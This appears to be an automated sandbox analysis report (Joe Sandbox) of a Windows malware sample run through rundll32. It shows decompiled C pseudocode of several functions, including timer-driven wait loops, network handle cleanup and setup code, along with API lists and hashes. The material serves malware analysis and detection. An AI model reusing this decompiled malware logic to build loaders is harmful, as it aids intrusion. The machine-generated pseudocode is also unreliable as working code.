                                      0x04de7f6a
                                      0x04de7f6d
                                      0x04de7f72
                                      0x04de7f76
                                      0x04de7f89
                                      0x04de7f8b
                                      0x04de8033
                                      0x04de8033
                                      0x04de803a
                                      0x04de803d
                                      0x04de8047
                                      0x04de8047
                                      0x04de804b
                                      0x04de80c9
                                      0x04de80cc
                                      0x04de80ce
                                      0x04de80ce
                                      0x04de80d5
                                      0x04de80d7
                                      0x04de80e1
                                      0x04de80e4
                                      0x04de80e7
                                      0x04de80e7
                                      0x00000000
                                      0x04de804d
                                      0x04de8050
                                      0x04de807e
                                      0x04de8088
                                      0x04de808c
                                      0x04de8094
                                      0x04de8097
                                      0x04de809e
                                      0x04de80a8
                                      0x04de80a8
                                      0x04de80ac
                                      0x04de80b1
                                      0x04de80c0
                                      0x04de80c6
                                      0x04de80c6
                                      0x04de80ac
                                      0x00000000
                                      0x04de8057
                                      0x04de805a
                                      0x04de8062
                                      0x04de8077
                                      0x04de807c
                                      0x00000000
                                      0x00000000
                                      0x04de807c
                                      0x00000000
                                      0x04de8062
                                      0x04de8050
                                      0x04de804b
                                      0x04de7f91
                                      0x04de7f98
                                      0x04de7fa8
                                      0x04de7fab
                                      0x04de7fb1
                                      0x04de7fb5
                                      0x04de7ff8
                                      0x04de8004
                                      0x04de802d
                                      0x04de8006
                                      0x04de800a
                                      0x04de8010
                                      0x04de8018
                                      0x04de801a
                                      0x04de801d
                                      0x04de8023
                                      0x04de8025
                                      0x04de8025
                                      0x04de8018
                                      0x04de800a
                                      0x00000000
                                      0x04de8004
                                      0x04de7fbd
                                      0x04de7fc0
                                      0x04de7fc7
                                      0x04de7fd7
                                      0x04de7fda
                                      0x04de7fea
                                      0x00000000
                                      0x04de7ff0
                                      0x04de7fd1
                                      0x04de7fd5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de7fd5
                                      0x04de7fa2
                                      0x04de7fa6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de7fa6
                                      0x04de7f7f
                                      0x04de7f83
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04DE7F2E
                                      • LoadLibraryA.KERNEL32(?), ref: 04DE7FAB
                                      • GetLastError.KERNEL32 ref: 04DE7FB7
                                      • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04DE7FEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                      • String ID: $
                                      • API String ID: 948315288-3993045852
                                      • Opcode ID: 70c8ba00d7957935f6efca398fedea6dc6abbd1192baf7afb5dc7891830cf449
                                      • Instruction ID: 314218e29e571852956348b15429af91fb0caa5c2e78b8f3ac851f4be12f2606
                                      • Opcode Fuzzy Hash: 70c8ba00d7957935f6efca398fedea6dc6abbd1192baf7afb5dc7891830cf449
                                      • Instruction Fuzzy Hash: F3812CB1B006059FDB25EF9AD890AAEB7F5FB48710F11802AF505D7340E775E905CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE6B13 Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 138 4de6b13-4de6b45 memset CreateWaitableTimerA 139 4de6b4b-4de6ba4 _allmul SetWaitableTimer WaitForMultipleObjects 138->139 140 4de6cc6-4de6ccc GetLastError 138->140 142 4de6c2e-4de6c34 139->142 143 4de6baa-4de6bad 139->143 141 4de6cd0-4de6cda 140->141 144 4de6c35-4de6c39 142->144 145 4de6baf call 4de67e2 143->145 146 4de6bb8 143->146 147 4de6c3b-4de6c43 RtlFreeHeap 144->147 148 4de6c49-4de6c4d 144->148 151 4de6bb4-4de6bb6 145->151 150 4de6bc2 146->150 147->148 148->144 152 4de6c4f-4de6c59 CloseHandle 148->152 153 4de6bc6-4de6bcb 150->153 151->146 151->150 152->141 154 4de6bde-4de6c0b call 4de5803 153->154 155 4de6bcd-4de6bd4 153->155 159 4de6c0d-4de6c18 154->159 160 4de6c5b-4de6c60 154->160 155->154 156 4de6bd6 155->156 156->154 159->153 161 4de6c1a-4de6c25 call 4de29f2 159->161 162 4de6c7f-4de6c87 160->162 163 4de6c62-4de6c68 160->163 169 4de6c2a 161->169 164 4de6c8d-4de6cbb _allmul SetWaitableTimer WaitForMultipleObjects 162->164 163->142 166 4de6c6a-4de6c7d call 4de3f62 163->166 164->153 168 4de6cc1 164->168 166->164 168->142 169->142
                                      C-Code - Quality: 83%
                                      			E04DE6B13(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4dea2e0);
					_v76 = 0;
					_v80 = 0;
					L04DE81CA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x4dea30c; // 0x2d4
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4dea2ec = 5;
						} else {
							_t69 = E04DE67E2(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x4dea300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E04DE5803( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E04DE29F2(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4dea2e4);
							goto L21;
						} else {
							__eflags =  *0x4dea2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04DE3F62();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4dea2e8);
								L21:
								L04DE81CA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x4dea2d8, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                                      0x04de6b13
                                      0x04de6b29
                                      0x04de6b2d
                                      0x04de6b32
                                      0x04de6b39
                                      0x04de6b3f
                                      0x04de6b45
                                      0x04de6ccc
                                      0x04de6b4b
                                      0x04de6b4b
                                      0x04de6b4d
                                      0x04de6b52
                                      0x04de6b53
                                      0x04de6b59
                                      0x04de6b5d
                                      0x04de6b61
                                      0x04de6b6f
                                      0x04de6b7d
                                      0x04de6b81
                                      0x04de6b83
                                      0x04de6b90
                                      0x04de6b9c
                                      0x04de6b9e
                                      0x04de6ba4
                                      0x04de6bad
                                      0x04de6bb8
                                      0x04de6bb8
                                      0x04de6baf
                                      0x04de6baf
                                      0x04de6bb6
                                      0x00000000
                                      0x00000000
                                      0x04de6bb6
                                      0x04de6bc2
                                      0x00000000
                                      0x04de6bc6
                                      0x04de6bcb
                                      0x04de6bd6
                                      0x04de6bd6
                                      0x04de6bde
                                      0x04de6be4
                                      0x04de6bec
                                      0x04de6bf5
                                      0x04de6bfc
                                      0x04de6c00
                                      0x04de6c05
                                      0x04de6c0b
                                      0x00000000
                                      0x00000000
                                      0x04de6c0d
                                      0x04de6c11
                                      0x04de6c18
                                      0x00000000
                                      0x04de6c1a
                                      0x04de6c25
                                      0x04de6c2a
                                      0x04de6c2a
                                      0x00000000
                                      0x04de6c5b
                                      0x04de6c5b
                                      0x04de6c60
                                      0x04de6c7f
                                      0x04de6c81
                                      0x04de6c86
                                      0x04de6c87
                                      0x00000000
                                      0x04de6c62
                                      0x04de6c62
                                      0x04de6c68
                                      0x00000000
                                      0x04de6c6a
                                      0x04de6c6a
                                      0x04de6c6f
                                      0x04de6c71
                                      0x04de6c76
                                      0x04de6c77
                                      0x04de6c8d
                                      0x04de6c8d
                                      0x04de6c95
                                      0x04de6ca3
                                      0x04de6ca7
                                      0x04de6cb3
                                      0x04de6cb5
                                      0x04de6cb9
                                      0x04de6cbb
                                      0x00000000
                                      0x04de6cc1
                                      0x00000000
                                      0x04de6cc1
                                      0x04de6cbb
                                      0x04de6c68
                                      0x00000000
                                      0x04de6c60
                                      0x04de6c2e
                                      0x04de6c30
                                      0x04de6c34
                                      0x04de6c35
                                      0x04de6c35
                                      0x04de6c39
                                      0x04de6c43
                                      0x04de6c43
                                      0x04de6c49
                                      0x04de6c4c
                                      0x04de6c4c
                                      0x04de6c53
                                      0x04de6c53
                                      0x04de6cda
                                      0x00000000

                                      APIs
                                      • memset.NTDLL ref: 04DE6B2D
                                      • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04DE6B39
                                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04DE6B61
                                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04DE6B81
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?), ref: 04DE6B9C
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?,00000000), ref: 04DE6C43
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?,00000000,?,?), ref: 04DE6C53
                                      • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04DE6C8D
                                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04DE6CA7
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04DE6CB3
                                        • Part of subcall function 04DE67E2: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,054A93D8,00000000,?,7705F710,00000000,7705F730), ref: 04DE6831
                                        • Part of subcall function 04DE67E2: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,054A9410,?,00000000,30314549,00000014,004F0053,054A93CC), ref: 04DE68CE
                                        • Part of subcall function 04DE67E2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04DE6BB4), ref: 04DE68E0
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?,00000000,?,?), ref: 04DE6CC6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                      • String ID:
                                      • API String ID: 3521023985-0
                                      • Opcode ID: 3853f8adbf0d6188266b73827563153d18f314d5a09d3d2b6bed4211f4023260
                                      • Instruction ID: dca1823b5fee337de514602fe7b95cc27ff6829af79c3947f2e0a3d619dcc06e
                                      • Opcode Fuzzy Hash: 3853f8adbf0d6188266b73827563153d18f314d5a09d3d2b6bed4211f4023260
                                      • Instruction Fuzzy Hash: FB517CB1509320AFD711BF179C44DABBBE8FB84724F804A1AF8A596250D775E904CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE15B9 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 93%
                                      			E04DE15B9(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04DE3A6F(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E04DE4C73(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E04DE4C73(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E04DE4C73(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E04DE4C73(_t46);
				}
				return _t24;
			}












                                      0x04de15b9
                                      0x04de15b9
                                      0x04de15bb
                                      0x04de15bd
                                      0x04de15c4
                                      0x04de15cb
                                      0x04de15cb
                                      0x04de15d0
                                      0x04de15d3
                                      0x04de15da
                                      0x04de15e3
                                      0x04de15e7
                                      0x04de15ec
                                      0x04de15ec
                                      0x04de15ee
                                      0x04de15f3
                                      0x04de15f7
                                      0x04de15fc
                                      0x04de15fc
                                      0x04de15fe
                                      0x04de1603
                                      0x04de1607
                                      0x04de160c
                                      0x04de160c
                                      0x04de160e
                                      0x04de1619
                                      0x04de161c
                                      0x04de161c
                                      0x04de161e
                                      0x04de1623
                                      0x04de1626
                                      0x04de1626
                                      0x04de1628
                                      0x04de162f
                                      0x04de1632
                                      0x04de1637
                                      0x04de163a
                                      0x04de163a
                                      0x04de163d
                                      0x04de1642
                                      0x04de1645
                                      0x04de1645
                                      0x04de164a
                                      0x04de164e
                                      0x04de1651
                                      0x04de1651
                                      0x04de1656
                                      0x04de165b
                                      0x00000000
                                      0x04de165e
                                      0x04de1665

                                      APIs
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 04DE15E7
                                      • InternetCloseHandle.WININET(?), ref: 04DE15EC
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 04DE15F7
                                      • InternetCloseHandle.WININET(?), ref: 04DE15FC
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 04DE1607
                                      • InternetCloseHandle.WININET(?), ref: 04DE160C
                                      • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,04DE53E9,?,?,00000000,00000000,770481D0), ref: 04DE161C
                                      • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04DE53E9,?,?,00000000,00000000,770481D0), ref: 04DE1626
                                        • Part of subcall function 04DE3A6F: WaitForMultipleObjects.KERNEL32(00000002,04DE7B35,00000000,04DE7B35,?,?,?,04DE7B35,0000EA60), ref: 04DE3A8A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                      • String ID:
                                      • API String ID: 2172891992-0
                                      • Opcode ID: 44f18083f14ae67ab3900705553eb14f046d33bd6034487d9a82aa49d926dde8
                                      • Instruction ID: 07ad4ace054b181b09d6cf6686b1852e851c2a3dc9c3f92e02940eead5270adf
                                      • Opcode Fuzzy Hash: 44f18083f14ae67ab3900705553eb14f046d33bd6034487d9a82aa49d926dde8
                                      • Instruction Fuzzy Hash: BF11B776700648ABC630BEABED88C6FB7EAFB442443994D1DE046D3620C735FC458A64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE2C52 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 228 4de2c52-4de2c6c call 4de175d 231 4de2c6e-4de2c7c 228->231 232 4de2c82-4de2c90 228->232 231->232 234 4de2ca2-4de2cbd call 4de5765 232->234 235 4de2c92-4de2c95 232->235 240 4de2cbf-4de2cc5 234->240 241 4de2cc7 234->241 235->234 236 4de2c97-4de2c9c 235->236 236->234 238 4de2e25 236->238 242 4de2e27-4de2e2c 238->242 243 4de2ccd-4de2ce2 call 4de3ef8 call 4de5410 240->243 241->243 248 4de2ced-4de2cf3 243->248 249 4de2ce4-4de2ce7 CloseHandle 243->249 250 4de2d19-4de2d31 call 4de4df6 248->250 251 4de2cf5-4de2cfa 248->251 249->248 260 4de2d5d-4de2d5f 250->260 261 4de2d33-4de2d5b memset RtlInitializeCriticalSection 250->261 252 4de2e10-4de2e15 251->252 253 4de2d00 251->253 256 4de2e1d 252->256 257 4de2e17-4de2e1b 252->257 255 4de2d03-4de2d12 call 4de3e6c 253->255 265 4de2d14 255->265 263 4de2e23 256->263 257->242 257->256 264 4de2d60-4de2d64 260->264 261->264 263->242 264->252 266 4de2d6a-4de2d80 264->266 265->252 268 4de2d82-4de2dae wsprintfA 266->268 269 4de2db0-4de2db2 266->269 270 4de2db3-4de2db7 268->270 269->270 270->252 271 4de2db9-4de2dd9 call 4de12d3 call 4de475f 270->271 271->252 276 4de2ddb-4de2de2 call 4de21fc 271->276 279 4de2de9-4de2df0 276->279 280 4de2de4-4de2de7 276->280 281 4de2e05-4de2e09 call 4de6b13 279->281 282 4de2df2-4de2df4 279->282 280->252 285 4de2e0e 281->285 282->252 284 4de2df6-4de2e03 call 4de4ecb 282->284 284->252 284->281 285->252
                                      C-Code - Quality: 57%
                                      			E04DE2C52(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04DE175D();
				if(_t21 != 0) {
					_t59 =  *0x4dea2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4dea2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4dea178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04DE5765( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4dea348; // 0x6bd5a8
					if( *0x4dea2fc > 5) {
						_t8 = _t26 + 0x4deb5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4deb9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04DE3EF8(_t27, _t27);
					_t31 = E04DE5410(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x4dea310 =  *0x4dea310 ^ 0x81bbe65d;
						_t32 = E04DE4DF6(0x60);
						 *0x4dea3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4dea3cc; // 0x54a95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4dea3cc; // 0x54a95b0
							 *_t51 = 0x4deb81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4dea2d8, 0, 0x43);
							 *0x4dea368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4dea2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4dea348; // 0x6bd5a8
								_t13 = _t58 + 0x4deb55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4de9287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04DE12D3( ~_v8 &  *0x4dea310, 0x4dea00c); // executed
								_t42 = E04DE475F(0, _t55, _t63, 0x4dea00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04DE21FC(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04DE6B13(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04DE4ECB(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4dea17c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04DE3E6C(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                      0x04de2c52
                                      0x04de2c5c
                                      0x04de2c5f
                                      0x04de2c62
                                      0x04de2c65
                                      0x04de2c6c
                                      0x04de2c6e
                                      0x04de2c7a
                                      0x04de2c7c
                                      0x04de2c7c
                                      0x04de2c85
                                      0x04de2c8b
                                      0x04de2c90
                                      0x04de2caa
                                      0x04de2cb6
                                      0x04de2cb8
                                      0x04de2cbd
                                      0x04de2cc7
                                      0x04de2cc7
                                      0x04de2cbf
                                      0x04de2cbf
                                      0x04de2cbf
                                      0x04de2cbf
                                      0x04de2cce
                                      0x04de2cdb
                                      0x04de2ce2
                                      0x04de2ce7
                                      0x04de2ce7
                                      0x04de2cf0
                                      0x04de2cf3
                                      0x04de2d19
                                      0x04de2d25
                                      0x04de2d2a
                                      0x04de2d2f
                                      0x04de2d31
                                      0x04de2d5d
                                      0x04de2d5f
                                      0x04de2d33
                                      0x04de2d37
                                      0x04de2d3c
                                      0x04de2d41
                                      0x04de2d48
                                      0x04de2d4e
                                      0x04de2d53
                                      0x04de2d59
                                      0x04de2d60
                                      0x04de2d62
                                      0x04de2d64
                                      0x04de2d73
                                      0x04de2d79
                                      0x04de2d7e
                                      0x04de2d80
                                      0x04de2db0
                                      0x04de2db2
                                      0x04de2d82
                                      0x04de2d82
                                      0x04de2d88
                                      0x04de2d95
                                      0x04de2d9b
                                      0x04de2d9b
                                      0x04de2da3
                                      0x04de2dac
                                      0x04de2db3
                                      0x04de2db5
                                      0x04de2db7
                                      0x04de2dbe
                                      0x04de2dcb
                                      0x04de2dd0
                                      0x04de2dd5
                                      0x04de2dd7
                                      0x04de2dd9
                                      0x00000000
                                      0x00000000
                                      0x04de2ddb
                                      0x04de2de0
                                      0x04de2de2
                                      0x04de2de9
                                      0x04de2ded
                                      0x04de2df0
                                      0x04de2e05
                                      0x04de2e09
                                      0x04de2e0e
                                      0x00000000
                                      0x04de2e0e
                                      0x04de2df2
                                      0x04de2df4
                                      0x00000000
                                      0x00000000
                                      0x04de2dff
                                      0x04de2e01
                                      0x04de2e03
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de2e03
                                      0x04de2de6
                                      0x04de2de6
                                      0x04de2db7
                                      0x04de2cf5
                                      0x04de2cf5
                                      0x04de2cfa
                                      0x04de2e10
                                      0x04de2e15
                                      0x04de2e1d
                                      0x04de2e1d
                                      0x00000000
                                      0x04de2e15
                                      0x04de2d00
                                      0x04de2d03
                                      0x04de2d0d
                                      0x04de2d14
                                      0x00000000
                                      0x04de2e25
                                      0x04de2e25
                                      0x04de2e28
                                      0x04de2e2c
                                      0x04de2e2c

                                      APIs
                                        • Part of subcall function 04DE175D: GetModuleHandleA.KERNEL32(4C44544E,00000000,04DE2C6A,00000001), ref: 04DE176C
                                      • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04DE2CE7
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • memset.NTDLL ref: 04DE2D37
                                      • RtlInitializeCriticalSection.NTDLL(054A9570), ref: 04DE2D48
                                        • Part of subcall function 04DE4ECB: memset.NTDLL ref: 04DE4EE5
                                        • Part of subcall function 04DE4ECB: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04DE4F2B
                                        • Part of subcall function 04DE4ECB: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04DE4F36
                                      • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04DE2D73
                                      • wsprintfA.USER32 ref: 04DE2DA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
